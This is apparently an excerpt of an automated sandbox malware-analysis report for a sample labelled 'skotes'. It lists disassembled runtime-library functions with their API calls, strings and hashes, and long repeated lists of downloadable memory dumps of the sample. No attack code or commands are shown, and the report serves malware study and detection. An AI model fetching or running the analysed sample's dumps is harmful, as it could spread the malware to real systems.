                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcsrchr
                                                                                                                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                    • API String ID: 1752292252-4019086052
                                                                                                                                                                    • Opcode ID: aa0c4ba0bf2fe2b0cef62da66be3684f59d5cb4c13d92853abcbc7a31beb13c2
                                                                                                                                                                    • Instruction ID: 591f74249fca1ba8ba1eca85bb67e422a49dfddbed7fd9b98ef246b952bf307c
                                                                                                                                                                    • Opcode Fuzzy Hash: aa0c4ba0bf2fe2b0cef62da66be3684f59d5cb4c13d92853abcbc7a31beb13c2
                                                                                                                                                                    • Instruction Fuzzy Hash: 5C012627708A232567165418DE42BA71B8B8BC2BB4B2A402EFC94F73C1EF45DC4221E4
                                                                                                                                                                    Function 0062FA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0062FB06
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                    • API String ID: 348560076-465693683
                                                                                                                                                                    • Opcode ID: f4c1ee6c40c1b40e36e85aeff7196eb533be83ebe34a468940ec36997dbe66b4
                                                                                                                                                                    • Instruction ID: 52e6e53b3752fc75eca0262ec4644c9622d4fb031bd38d67a169e576b2625fff
                                                                                                                                                                    • Opcode Fuzzy Hash: f4c1ee6c40c1b40e36e85aeff7196eb533be83ebe34a468940ec36997dbe66b4
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B012D759407256D632477746D93AFB26EFCE06708B21293EB842E7242EEA5E80046B4
                                                                                                                                                                    Function 00642097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • StructuredWorkStealingQueue.LIBCMT ref: 006420B7
                                                                                                                                                                      • Part of subcall function 0063CAF3: Mailbox.LIBCMT ref: 0063CB2D
                                                                                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006420C8
                                                                                                                                                                    • StructuredWorkStealingQueue.LIBCMT ref: 006420FE
                                                                                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0064210F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                    • String ID: e
                                                                                                                                                                    • API String ID: 1411586358-4024072794
                                                                                                                                                                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                    • Instruction ID: dc80763a3d87aa3e94a1b0121f1609b7361464582d2f4a9aad7c9f9d02d37ce0
                                                                                                                                                                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                    • Instruction Fuzzy Hash: 1311A331200106ABDB55DE69C8A16EA77E7EF03364B74819EFD069F202DB71D902CBA4
                                                                                                                                                                    Function 0062D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 0062D05D
                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0062D03B
                                                                                                                                                                    • kernel32.dll, xrefs: 0062D04C
                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 0062D069
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ___scrt_fastfail
                                                                                                                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                    • API String ID: 2964418898-3242537097
                                                                                                                                                                    • Opcode ID: 017d5ca92744293e5390b02857f7ea9e3c9ad791c595f517b4e53696a8725e69
                                                                                                                                                                    • Instruction ID: 85a86a814c56792868fb7e96a5aed445b46ed483fac1cab8c94c64a1b003135f
                                                                                                                                                                    • Opcode Fuzzy Hash: 017d5ca92744293e5390b02857f7ea9e3c9ad791c595f517b4e53696a8725e69
                                                                                                                                                                    • Instruction Fuzzy Hash: 0601F771682F2169F7353F717D00EAB118BCF42B88F0A3510AD05E7290DA90D8418C71
                                                                                                                                                                    Function 0063E8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 0063E91E
                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0063E926
                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0063E950
                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0063E959
                                                                                                                                                                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0063E9DC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
